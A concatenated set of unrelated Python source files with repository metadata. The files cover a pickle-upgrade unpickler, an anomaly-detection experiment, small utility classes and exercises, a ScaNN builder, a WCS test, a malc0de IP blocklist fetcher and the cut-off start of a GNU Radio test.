            # load the class...
            klass = self.import_name(module, name)

            # add the updater.... TODO - why the old name?
            self.add_updater(original_module, original_name, klass)
        else:
            # there is no updater so we will be reading in an up to date
            # version of the file...
            try:
                klass = Unpickler.find_class(self, module, name)
            except Exception:
                logger.error("Looking for [%s] [%s]" % (module, name))
                logger.exception(
                    "Problem using default unpickle functionality"
                )

            # restore the original __setstate__ if necessary
            fn = getattr(klass, "__setstate_original__", False)
            if fn:
                setattr(klass, "__setstate__", fn)

        return klass

    def add_updater(self, module, name, klass):
        """If there is an updater defined for this class we will add it to the
        class as the __setstate__ method.
        """
        fn = self.updater.setstates.get((module, name), False)

        if fn:
            # move the existing __setstate__ out of the way
            self.backup_setstate(module, klass)

            # add the updater into the class
            setattr(klass, "__updater__", fn)

            # hook up our __setstate__ which updates self.__dict__
            setattr(klass, "__setstate__", __replacement_setstate__)
        else:
            pass

    def backup_setstate(self, module, klass):
        """If the class has a user defined __setstate__ we back it up."""
        if getattr(klass, "__setstate__", False):
            if getattr(klass, "__setstate_original__", False):
                # don't overwrite the original __setstate__
                # (use a per-updater-class name instead)
                name = "__setstate__%s" % self.updater.__class__
            else:
                # backup the original __setstate__ which we will restore
                # and run later when we have finished updating the class
                name = "__setstate_original__"

            method = getattr(klass, "__setstate__")
            setattr(klass, name, method)
        else:
            # the class has no __setstate__ method so do nothing
            pass

    def import_name(self, module, name):
        """
        If the class is needed for the latest version of the application then
        it should presumably exist.

        If the class no longer exists then we should perhaps return
        a proxy of the class.

        If the persisted file is at v1 say and the application is at v3 then
        objects that are required for v1 and v2 do not have to exist they only
        need to be placeholders for the state during an upgrade.
        """
        module = __import__(module, globals(), locals(), [name])
        return vars(module)[name]
|
[
"brady.dye@bison.howard.edu"
] |
brady.dye@bison.howard.edu
|
c3d059c6a856c09a0127d8793a81b5c97ef00863
|
a3ff8c37e8079412477e203faa2f9526ffb66b7a
|
/realworld_expt/expt.py
|
9d07e0d72ad6f148d9a7608d719a22062f2252cf
|
[] |
no_license
|
greentfrapp/temp
|
07c83aaf08dd236f6305af877280698612129681
|
406864f3c7c2f78c23df2c29b640ba9ea622eb27
|
refs/heads/master
| 2020-03-29T19:24:48.466126
| 2019-01-30T15:14:10
| 2019-01-30T15:14:10
| 150,261,784
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,493
|
py
|
from __future__ import print_function
try:
raw_input
except:
raw_input = input
import numpy as np
from keras.models import load_model
import json
import tensorflow as tf
from sklearn.ensemble import IsolationForest
import matplotlib.pyplot as plt
from scipy.stats import chi
from absl import flags
from absl import app
from utils import MammoData as Data
FLAGS = flags.FLAGS
flags.DEFINE_bool("plot", False, "Plot")
flags.DEFINE_bool("train", False, "Train")
flags.DEFINE_integer("std", 10, "std")
flags.DEFINE_integer("iter", 5, "No. of iForest runs per sample set")
flags.DEFINE_integer("samples", 5, "No. of sample sets generated")
def cal_auc(x, y):
    """Area under the curve y(x), computed with the trapezoidal rule."""
    area = np.trapz(y, x)
    return area
def get_dist(values):
    """Weight each row of *values* by its distance from the centroid,
    keeping only points whose radius lies in [2.3, 2.7] times the std of
    a chi(2) distribution scaled by the per-axis spread; everything else
    gets weight 0. The result is normalized to sum to 1 (NaN if no point
    survives the band filter).
    """
    centroid = np.mean(values, axis=0)
    spread = np.linalg.norm(np.std(values, axis=0))
    radial_std = chi.std(2, 0, spread)
    radii = np.linalg.norm(values - centroid, axis=1)
    # Zero out anything outside the [2.3, 2.7] * radial_std annulus.
    in_band = (radii >= 2.3 * radial_std) & (radii <= 2.7 * radial_std)
    radii = np.where(in_band, radii, 0.)
    return radii / np.sum(radii)
def roc_val(classifier, x_test, y_test):
    """Score *classifier* on (x_test, y_test).

    The classifier is expected to emit -1 for anomalies (sklearn
    IsolationForest convention); y_test uses 1 for anomaly, 0 for normal.
    Returns {"TPR", "FPR", "F1"}.
    """
    flagged = (classifier.predict(x_test) == -1).astype(np.int32)
    agree = np.where(y_test == flagged)
    tp = np.sum(flagged[agree] == 1)
    tn = np.sum(flagged[agree] == 0)
    fp = np.sum(flagged) - tp
    fn = np.sum(flagged == 0) - tn
    if tp == 0:
        # Convention: no true positives -> zero recall, perfect precision.
        recall = tp_rate = 0.
        precision = 1.
    else:
        recall = tp_rate = tp / (tp + fn)
        precision = tp / (tp + fp)
    if recall + precision == 0:
        f1 = 0.
    else:
        f1 = (2 * recall * precision) / (recall + precision)
    fp_rate = fp / (fp + tn)
    return {"TPR": tp_rate, "FPR": fp_rate, "F1": f1}
def generate(n_run):
    """Generate `synth_size` doped samples for sample-set *n_run*.

    Encodes the training data, draws latent points on a radius-10 sphere
    around the latent centroid, decodes them, dumps them to JSON and
    returns them as an array.
    """
    (x_train, y_train), (x_test, y_test) = dataset.load_data()
    x = x_train
    latent = encoder.predict(x)
    center = np.mean(latent, axis=0)
    # Fresh latent points, normalized onto a sphere of radius 10 and
    # shifted to the centroid of the real data's latent cloud.
    latent = np.random.randn(synth_size, 2)
    for i, vector in enumerate(latent):
        latent[i] = 10. * vector / np.linalg.norm(vector)
    latent += center
    samples = decoder.predict(latent.reshape(-1, 2))
    # BUG FIX: the format string had only one placeholder, so n_run was
    # silently dropped and every sample set overwrote the same file.
    with open(folder + "synthetic_samples_{}_{}.json".format(FLAGS.std, n_run), 'w') as file:
        json.dump(samples.tolist(), file)
    return samples
def smote(n_run):
    """Generate `synth_size` SMOTE samples for sample-set *n_run*.

    For each sample: pick a random training point, find its nearest
    neighbor, and interpolate at a random position on the segment
    between them. Dumps the samples to JSON and returns them as a list.
    """
    (x_train, y_train), (x_test, y_test) = dataset.load_data()
    x = x_train
    samples = []
    for i in np.arange(synth_size):
        choice = np.random.choice(np.arange(len(x)))
        a = x[choice]
        # Distances from `a` to every OTHER point (choice removed).
        x_copy = np.concatenate((x[:choice], x[choice + 1:]))
        x_copy -= a
        x_copy = np.linalg.norm(x_copy, axis=1)
        b = np.argmin(x_copy)
        if b >= choice:
            # re-align the index after having removed `choice` above
            b += 1
        b = x[b]
        scale = np.random.rand()
        c = scale * (a - b) + b
        samples.append(list(c))
    # BUG FIX: the format string had only one placeholder, so n_run was
    # silently dropped and every sample set overwrote the same file.
    with open(folder + "smote_reg_data_samples_{}_{}.json".format(FLAGS.std, n_run), 'w') as file:
        json.dump(samples, file)
    return samples
def expt(n_run):
    """Run one comparison of doping vs. SMOTE vs. raw training data.

    Trains IsolationForest at a sweep of contamination values, averaging
    FLAGS.iter fits per value, and returns
    {method: {"TPR"|"FPR"|"F1": [per-contamination means]}}.
    """
    (x_train, y_train), (x_test, y_test) = dataset.load_data()
    synthetic = {
        "doping": generate(n_run),
        "smote": smote(n_run),
    }
    train_sets = {"original": x_train}
    for kind, extra in synthetic.items():
        train_sets[kind] = np.concatenate((x_train, extra))
    stat_types = ["TPR", "FPR", "F1"]
    stats = {method: {s: [] for s in stat_types} for method in train_sets}
    contaminations = np.concatenate(
        ([0.001, 0.003, 0.005, 0.007], np.arange(0.01, 0.3, 0.02)))
    for i, contamination in enumerate(contaminations):
        print("Run #{}/{}".format(i + 1, len(contaminations)))
        per_run = {method: {s: [] for s in stat_types} for method in train_sets}
        for _ in np.arange(FLAGS.iter):
            for method, data in train_sets.items():
                forest = IsolationForest(contamination=contamination)
                forest.fit(data)
                outcome = roc_val(forest, x_test, y_test)
                for stat in outcome:
                    per_run[method][stat].append(outcome[stat])
        for method in stats:
            for stat in stat_types:
                stats[method][stat].append(np.mean(per_run[method][stat]))
    return stats
def train():
    """Run FLAGS.samples experiments, average the per-method curves
    elementwise across runs, and dump the result to `folder`/stats.json.
    """
    methods = ["original", "doping", "smote"]
    stat_types = ["TPR", "FPR", "F1"]
    collected = {method: {s: [] for s in stat_types} for method in methods}
    for run in np.arange(FLAGS.samples):
        run_stats = expt(run)
        for method in methods:
            for stat in stat_types:
                collected[method][stat].append(run_stats[method][stat])
    for method in methods:
        for stat in stat_types:
            collected[method][stat] = np.mean(collected[method][stat], axis=0).tolist()
    # (original code called .format(FLAGS.std) on a string with no
    # placeholder — the filename is simply "stats.json")
    with open(folder + "stats.json", 'w') as file:
        json.dump(collected, file)
def plot(all_stats, methods=None):
    """Print F1, AUC and G-mean rankings (best first) for each method.

    *all_stats* maps method name -> {"TPR": [...], "FPR": [...], "F1": [...]}.
    Despite the name this only prints; nothing is drawn.
    """
    if methods == None:
        methods = all_stats.keys()
    f1_rank, auc_rank, g_rank = [], [], []
    for method in methods:
        curve = all_stats[method]
        best_f1 = np.max(curve["F1"])
        fpr = np.concatenate(([0.0], curve["FPR"], [1.0]))
        tpr = np.concatenate(([0.0], curve["TPR"], [1.0]))
        auc = cal_auc(fpr, tpr)
        # Recover precision from F1 and recall at the best-F1 operating point,
        # then take the geometric mean of precision and recall.
        recall = curve["TPR"][np.argmax(curve["F1"])]
        precision = best_f1 * recall / (2 * recall - best_f1)
        g_mean = (recall * precision) ** 0.5
        f1_rank.append([best_f1, method])
        auc_rank.append([auc, method])
        g_rank.append([g_mean, method])
    for title, ranking in (("F1", f1_rank), ("AUC", auc_rank), ("G", g_rank)):
        ranking.sort(reverse=True)
        print("\n{}:".format(title))
        for score, method in ranking:
            print("{}: {}".format(method, score))
def main(unused_argv):
    """Entry point: load encoder/decoder models and either run the
    training sweep (--train) or print rankings from stats.json (--plot).
    """
    global desc, folder, synth_size, encoder, decoder, dataset
    desc = "aae"
    # The previous version first built a std-specific folder name and then
    # immediately overwrote it with "./"; only the effective value is kept.
    folder = "./"
    tf.gfile.MakeDirs(folder)
    synth_size = 1100
    encoder = load_model('{}_encoder_{}_test.h5'.format(desc, FLAGS.std))
    decoder = load_model('{}_decoder_{}_test.h5'.format(desc, FLAGS.std))
    dataset = Data()
    if FLAGS.train:
        train()
    elif FLAGS.plot:
        methods = ["original", "doping", "smote"]
        # ("stats.json".format(FLAGS.std) had no placeholder — plain name)
        with open(folder + "stats.json", 'r') as file:
            all_stats = json.load(file)
        plot(all_stats, methods)
if __name__ == "__main__":
app.run(main)
|
[
"limsweekiat@gmail.com"
] |
limsweekiat@gmail.com
|
dec281751603425b8397dc65a0ebbd7b8b50ff7f
|
a564b8277e33eb27009089ec2e216a4d266a8861
|
/官方配套代码/15/15.3/Senior/server/CrazyitDict.py
|
6fc2e469e9af559f3323a86b8dde9a2555759584
|
[
"Unlicense"
] |
permissive
|
yifengyou/crazy-python
|
3cb50f462e4ddb921c365e2f0cb3e846e6539383
|
28099bd5011de6981a7c5412783952cc7601ae0c
|
refs/heads/main
| 2023-06-18T18:10:52.691245
| 2021-07-18T14:21:03
| 2021-07-18T14:21:03
| 387,088,939
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,708
|
py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
class CrazyitDict(dict):
    """dict subclass with reverse (value-based) lookup and removal."""

    def key_from_value(self, val):
        """Return the first key whose value equals *val*, or None."""
        return next((k for k in self if self[k] == val), None)

    def remove_by_value(self, val):
        """Delete the first entry whose value equals *val* (no-op if absent)."""
        # iterate a snapshot of the keys so the deletion is safe
        for k in list(self.keys()):
            if self[k] == val:
                del self[k]
                return
|
[
"842056007@qq.com"
] |
842056007@qq.com
|
9e04759332a82f222f84a256886b4bd3e5300456
|
e42478c0c501a11280a3b0b3266a931215fd5a34
|
/fxdayu_data/handler/base.py
|
3e03b7fc7e8eeb0830d6ff42ded200f68ffccb42
|
[] |
no_license
|
limingbei/fxdayu_data
|
d36af819ee32e32e541eaf205b0e1c9309ffc89a
|
2d1541def42b31e839e1027a85cfd08665f731a3
|
refs/heads/master
| 2020-03-17T23:16:37.656128
| 2018-01-05T05:50:41
| 2018-01-05T05:50:41
| 134,038,018
| 1
| 0
| null | 2018-05-19T06:55:59
| 2018-05-19T06:55:59
| null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
# encoding:utf-8
from datetime import datetime
from pymongo.mongo_client import database
import pandas as pd
import pymongo
class DataHandler(object):
    """Abstract base for data-storage handlers.

    Every method is a no-op hook; concrete subclasses override the ones
    they support. Signatures are deliberately loose (*args, **kwargs) so
    each backend can define its own parameters.
    """

    def write(self, *args, **kwargs):
        # Persist new records.
        pass

    def read(self, *args, **kwargs):
        # Fetch records.
        pass

    def inplace(self, *args, **kwargs):
        # Replace existing data in place.
        pass

    def update(self, *args, **kwargs):
        # Modify existing records.
        pass

    def delete(self, *args, **kwargs):
        # Remove records.
        pass

    def table_names(self, *args, **kwargs):
        # List available tables/collections.
        pass
|
[
"862786917@qq.com"
] |
862786917@qq.com
|
4b6c1a8e10bab33aaa6629088bb2f48ab5184699
|
d2bb13cec7faf28e3d268312298f03c99806bd8b
|
/calc_tdc_offset/corelli_calc_tdc_offset_func_loop.py
|
f73d0e5a8641d0c738264885957499cec67aac99
|
[] |
no_license
|
rosswhitfield/corelli
|
06a91c26556ea788f20f973a1018a56e82a8c09a
|
d9e47107e3272c4457aa0d2e0732fc0446f54279
|
refs/heads/master
| 2021-08-07T14:04:24.426151
| 2021-08-03T19:19:05
| 2021-08-03T19:19:05
| 51,771,543
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
# Python 2 script: batch-compute TDC offsets for a range of CORELLI runs.
from corelli_calc_tdc_offset_func import *
# Runs 637..639; the commented range below was an earlier batch.
for i in range(637,640):
#for i in range(2100,2110):
    filename='CORELLI_'+str(i)
    results=calc_tdc_offset(filename)
    print results
|
[
"whitfieldre@ornl.gov"
] |
whitfieldre@ornl.gov
|
082ae04a5c36262e14182602b53ff46f5aa16fcf
|
1f08436bab6cd03bcfb257e8e49405cbc265195a
|
/8_function/Sample/functions_ex3.py
|
0b362e6fc10e31311f529f7db4e12747dd2833cc
|
[] |
no_license
|
kuchunbk/PythonBasic
|
e3ba6322f256d577e37deff09c814c3a374b93b2
|
a87135d7a98be8830d30acd750d84bcbf777280b
|
refs/heads/master
| 2020-03-10T04:28:42.947308
| 2018-04-17T04:25:51
| 2018-04-17T04:25:51
| 129,192,997
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
'''Question:
Write a Python function to multiply all the numbers in a list.
'''
# Python code:
def multiply(numbers):
    """Return the product of all values in *numbers* (1 for empty input)."""
    product = 1
    for value in numbers:
        product = product * value
    return product
print(multiply((8, 2, 3, -1, 7)))
'''Output sample:
-336
'''
|
[
"kuchunbk@gmail.com"
] |
kuchunbk@gmail.com
|
1bee663d7c4ec53d0aae190aa76827e89a0ec34e
|
b65032c8b76dd2115fd37ae45669a44537ad9df4
|
/Code/dictionary_words.py
|
a1ae64f3596492ec99008c0aa807de8a02d24fd2
|
[] |
no_license
|
reikamoon/CS-1.2-Intro-Data-Structures
|
a795dc8ca9e52f02cafb9d0782a80632bcc7b206
|
40b19ad8d93631bbdbd589fa95b0b3a7ec40b53a
|
refs/heads/master
| 2022-12-22T00:22:05.667638
| 2019-12-11T20:45:11
| 2019-12-11T20:45:11
| 220,103,212
| 0
| 0
| null | 2022-12-08T06:16:43
| 2019-11-06T22:35:08
|
Python
|
UTF-8
|
Python
| false
| false
| 642
|
py
|
from random import randint
from os import sys
def get_words():
    """Read the system dictionary file and return its lines as a list."""
    with open('/usr/share/dict/words', 'r') as handle:
        # split('\n') (not splitlines) keeps a trailing empty entry,
        # matching the original behavior.
        return handle.read().split('\n')
def random_words(integer_input, word_list):
    """Return a sentence of *integer_input* random words from *word_list*,
    each followed by a space.

    Fixes two defects in the original: it indexed the module-global
    `words` instead of the `word_list` parameter (NameError when called
    standalone), and the final iteration printed a header instead of
    appending a word, so the sentence came back one word short.
    """
    sentence = str()
    while integer_input > 0:
        index = randint(0, len(word_list) - 1)
        sentence += word_list[index] + ' '
        integer_input -= 1
    return sentence
if __name__ == '__main__':
    # CLI usage: first argument is the number of random words to emit.
    words = get_words()
    integer_input = int(sys.argv[1])
    print(random_words(integer_input, words))
|
[
"ambrosio.anjelica@gmail.com"
] |
ambrosio.anjelica@gmail.com
|
4c59bf2329fd1567caddbca76105185740dad7e5
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02987/s680269618.py
|
10f62cd0a31d38e548bfb5cbca9157ed13e880b2
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 254
|
py
|
S = input()
# "Yes" iff the 4-character string consists of exactly two distinct
# characters arranged as two pairs (e.g. "AABB", "ABAB", "ABBA").
paired = (
    (S[0] == S[1] and S[2] == S[3])
    or (S[0] == S[2] and S[1] == S[3])
    or (S[0] == S[3] and S[1] == S[2])
)
print('Yes' if paired and len(set(S)) == 2 else 'No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
d4661de7781d69bf47240b7d4a8effe187d22ad9
|
dea3e6876afe2fdae5b5b4a3f429cfce81b7a0a1
|
/tests/test_frameSetUtils.py
|
963a1cbd09e97306839efc9adabd9dc07e8a72a9
|
[] |
no_license
|
frossie-shadow/afw
|
741f09cd202a5a9cc3b3943696a389b94a4ee404
|
a1c44404738dcd73ff400e3bcd176ffe4dd51aab
|
refs/heads/master
| 2021-01-19T17:49:51.003432
| 2017-08-19T03:11:56
| 2017-08-19T03:11:56
| 35,149,129
| 0
| 0
| null | 2015-05-06T08:54:49
| 2015-05-06T08:54:49
| null |
UTF-8
|
Python
| false
| false
| 3,063
|
py
|
from __future__ import absolute_import, division, print_function
import unittest
from lsst.afw.coord import IcrsCoord
from lsst.afw.geom import arcseconds, degrees, makeCdMatrix, Point2D
from lsst.afw.geom.detail import makeTanWcsMetadata, readFitsWcs, readLsstSkyWcs
import lsst.utils.tests
PrintStrippedNames = False
class FrameSetUtilsTestCase(lsst.utils.tests.TestCase):
    """This is sparse because SkyWcs unit tests test much of this package
    """

    def setUp(self):
        # arbitrary values
        self.crpix = Point2D(100, 100)
        self.crval = IcrsCoord(30 * degrees, 45 * degrees)
        self.scale = 1.0 * arcseconds

    def makeMetadata(self):
        """Return a WCS that is typical for an image

        It will contain 32 cards:
        - 14 standard WCS cards
        - 15 standard cards:
          - SIMPLE, BITPIX, NAXIS, NAXIS1, NAXIS2, BZERO, BSCALE
          - DATE-OBS, MJD-OBS, TIMESYS
          - EXPTIME
          - 2 COMMENT cards
          - INHERIT
          - EXTEND
          - LTV1 and LTV2, an IRAF convention LSST uses for image XY0
        - 1 nonstandard card
        """
        # arbitrary values
        orientation = 0 * degrees
        flipX = False
        metadata = makeTanWcsMetadata(
            crpix = self.crpix,
            crval = self.crval,
            cdMatrix = makeCdMatrix(scale=self.scale, orientation=orientation, flipX=flipX),
        )
        # the 14 standard WCS cards promised by the docstring
        self.assertEqual(metadata.nameCount(), 14)
        metadata.add("SIMPLE", True)
        metadata.add("BITPIX", 16)
        metadata.add("NAXIS", 2)
        metadata.add("NAXIS1", 500)
        metadata.add("NAXIS2", 200)
        metadata.add("BZERO", 32768)
        metadata.add("BSCALE", 1)
        metadata.add("TIMESYS", "UTC")
        metadata.add("UTC-OBS", "12:04:45.73")
        metadata.add("DATE-OBS", "2006-05-20")
        metadata.add("EXPTIME", 5.0)
        metadata.add("COMMENT", "a comment")
        metadata.add("COMMENT", "another comment")
        metadata.add("EXTEND", True)
        metadata.add("INHERIT", False)
        metadata.add("LTV1", 5)
        metadata.add("LTV2", -10)
        metadata.add("ZOTHER", "non-standard")
        return metadata

    def testReadFitsWcsStripMetadata(self):
        # strip=True should remove the 14 WCS cards (32 -> 18);
        # strip=False must leave the metadata untouched.
        metadata = self.makeMetadata()
        self.assertEqual(len(metadata.toList()), 32)
        readFitsWcs(metadata, strip=False)
        self.assertEqual(len(metadata.toList()), 32)
        readFitsWcs(metadata, strip=True)
        self.assertEqual(len(metadata.toList()), 18)

    def testReadLsstSkyWcsStripMetadata(self):
        # same strip semantics as readFitsWcs, via the LSST wrapper
        metadata = self.makeMetadata()
        self.assertEqual(len(metadata.toList()), 32)
        readLsstSkyWcs(metadata, strip=False)
        self.assertEqual(len(metadata.toList()), 32)
        readLsstSkyWcs(metadata, strip=True)
        self.assertEqual(len(metadata.toList()), 18)
class TestMemory(lsst.utils.tests.MemoryTestCase):
    # Standard LSST leak check; the base class provides the tests.
    pass


def setup_module(module):
    # pytest hook: initialize the LSST test framework once per module.
    lsst.utils.tests.init()


if __name__ == "__main__":
    lsst.utils.tests.init()
    unittest.main()
|
[
"rowen@uw.edu"
] |
rowen@uw.edu
|
cafd330140fcfb6368723d583251829672ceb42d
|
a86599993fcca8fbe67ee02106281b5145f8db5e
|
/Laboratory 04/wdp_ftopt_l04z04pr.py
|
37e25e77b5d7c40c7a9717f6d5240df8b50d219e
|
[] |
no_license
|
pauliwu/Introduction-to-programming-in-python
|
2747572c73a5559c0636523f7b75ae6c4e79d51e
|
cc4be2030d1a0798054ec2c6b30425fd77d3e117
|
refs/heads/master
| 2022-03-31T09:15:33.191768
| 2020-01-30T22:05:53
| 2020-01-30T22:05:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
'''
Napisz program, który poprosi użytkownika o podanie promienia koła, a następnie wyświetli
informację o jego polu i obwodzie.
'''
def kolo(promien):
    """Return (area, circumference) of a circle of radius *promien*,
    using pi approximated as 3.14."""
    pi = 3.14
    return pi * promien ** 2, 2 * pi * promien
def main():
    """Prompt for a radius in cm and print the circle's circumference and area."""
    r = float(input("Wprowadz promien kola w cm: "))
    pole, obwod = kolo(r)
    print("Obwod = ", format(obwod, ".1f"), "cm")
    print("Pole = ", format(pole, ".1f"), "cm^2")


main()
|
[
"58003896+majsylw@users.noreply.github.com"
] |
58003896+majsylw@users.noreply.github.com
|
761115aa3bdc406dc4f4c52ccd593a7e80e5d5c2
|
c1ad248b8172c63f7756f14cb50f96cf726f90d0
|
/tensorflow_examples/lite/model_maker/core/utils/ondevice_scann_builder.py
|
9031bc02d9da8875c3b62beb2465f38818ce479a
|
[
"Apache-2.0"
] |
permissive
|
slmsshk/examples
|
846ec816c0c6d095cf49e4054df85a80375f4b7f
|
cd89a54b9e9577bebd22a9f083526ca8cb2b58b5
|
refs/heads/master
| 2022-08-16T19:59:03.695027
| 2022-08-07T07:30:14
| 2022-08-07T07:30:14
| 256,999,865
| 1
| 0
|
Apache-2.0
| 2020-04-19T12:59:03
| 2020-04-19T12:59:01
| null |
UTF-8
|
Python
| false
| false
| 1,856
|
py
|
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ScannBuilder class for on-device applications."""
from google.protobuf import text_format
from scann.proto import scann_pb2
from scann.scann_ops.py import scann_builder
from scann.scann_ops.py import scann_ops_pybind
def builder(db, num_neighbors, distance_measure):
  """pybind analogue of builder() in scann_ops.py for the on-device use case."""

  def builder_lambda(db, config, training_threads, **kwargs):
    # Invoked later by the builder with the finished config text;
    # delegates searcher construction to the pybind backend.
    return scann_ops_pybind.create_searcher(db, config, training_threads,
                                            **kwargs)

  return OndeviceScannBuilder(
      db, num_neighbors, distance_measure).set_builder_lambda(builder_lambda)
class OndeviceScannBuilder(scann_builder.ScannBuilder):
  """ScannBuilder for on-device applications."""

  def create_config(self):
    """Creates the config.

    Returns the parent builder's config re-serialized with residual
    quantization forced off, since that feature is unsupported on device.
    """
    config = super().create_config()
    # Round-trip the textproto so we can edit a single field.
    config_proto = scann_pb2.ScannConfig()
    text_format.Parse(config, config_proto)
    # We don't support residual quantization on device so we need to disable
    # use_residual_quantization.
    if config_proto.hash.asymmetric_hash.use_residual_quantization:
      config_proto.hash.asymmetric_hash.use_residual_quantization = False
    return text_format.MessageToString(config_proto)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
4a6b78de21ffdffea8c1583ad2df047b3419aa55
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_117/ch73_2019_04_04_18_01_16_761758.py
|
2a91c18fcec24852640d02b74224cf472d03ccae
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 266
|
py
|
def remove_vogais(letras):
    """Remove every lowercase vowel from the list *letras* in place and
    return the list.

    Fixes the original's unconditional `return remove_vogais(letras)` at
    the end, which recursed forever (the list never changes once all
    vowels are gone) and always ended in RecursionError.
    """
    i = 0
    while i < len(letras):
        if letras[i] in ('a', 'e', 'i', 'o', 'u'):
            # deleting shifts the rest left, so do NOT advance i
            del letras[i]
        else:
            i += 1
    return letras
|
[
"you@example.com"
] |
you@example.com
|
ba7639ad6a9c59bd8170920acdd5a7a269c096e7
|
e5270423abf42482d956548333d4105d684cca31
|
/trails/feeds/malc0de.py
|
09d204f3da28e20de8dc18f4ac03427f7557e5e3
|
[
"MIT"
] |
permissive
|
ana2s007/maltrail
|
2f5f556d222b6f1ba78affedce97400da125232a
|
80979e76c33dca58313141a0e4a2626b609c3ebf
|
refs/heads/master
| 2021-01-16T22:49:25.319116
| 2016-01-28T13:04:57
| 2016-01-28T13:04:57
| 50,610,789
| 1
| 0
| null | 2016-01-28T20:18:20
| 2016-01-28T20:18:20
| null |
UTF-8
|
Python
| false
| false
| 689
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2016 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/malc0de.ipset"
__check__ = "malc0de"
__info__ = "malware distribution"
__reference__ = "malc0de.com"
def fetch():
    """Download the malc0de ipset and return {ip: (__info__, __reference__)}."""
    trails = {}
    content = retrieve_content(__url__)
    # sanity marker: only parse when the payload looks like the real list
    if __check__ in content:
        for raw_line in content.split('\n'):
            entry = raw_line.strip()
            # skip blanks, comments and anything without a dot (not an IP)
            if entry and not entry.startswith('#') and '.' in entry:
                trails[entry] = (__info__, __reference__)
    return trails
|
[
"miroslav.stampar@gmail.com"
] |
miroslav.stampar@gmail.com
|
1a9fa3e8dcf8c60490f47495a2566b6a1f32a92a
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_009/ch90_2019_10_02_18_22_03_037134.py
|
fcae0603fe15fc773b6d8deebd33737ee6754ef6
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 224
|
py
|
def segundos_entre(x, y):
    """Return a Portuguese sentence giving the difference in seconds
    between two "%H:%M:%S" time strings (y minus x, wrapped into a day
    by timedelta.seconds).

    Fixes the original, which used `datetime` without any import in the
    file (NameError on first call) and contained a dead `t2 - t1`
    statement.
    """
    from datetime import datetime  # local import: the module never imported it
    t1 = datetime.strptime(x, "%H:%M:%S")
    t2 = datetime.strptime(y, "%H:%M:%S")
    a = (t2 - t1).seconds
    return f'A diferença entre os horários {x} e {y} é: {a} segundos'
|
[
"you@example.com"
] |
you@example.com
|
871eb6e8ee0778f806cecd0362c54b91bff6028c
|
d6e90e0326248389768fc9b6aece86b70e16f3e5
|
/code_examples/gnuradio/module_fmcw/gr-radar/python/qa_FMCW_separate_IQ_cc.py
|
7933b4c9829cbf1f1334c20a93dcfcf5f7cdd61a
|
[] |
no_license
|
stwunsch/gsoc-proposal
|
22d1d8f23b2f6008e59f80c4a51aab50a04b3e85
|
75d37e8a1e6d16ad0798bf3e7b4ab067d24f9a18
|
refs/heads/master
| 2021-01-19T16:57:41.145819
| 2014-04-14T16:15:08
| 2014-04-14T16:15:08
| 17,761,313
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,891
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2013 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest,blocks
import radar_swig as radar
class qa_FMCW_separate_IQ_cc (gr_unittest.TestCase):
    """QA test: FMCW_separate_IQ_cc must split an interleaved stream into
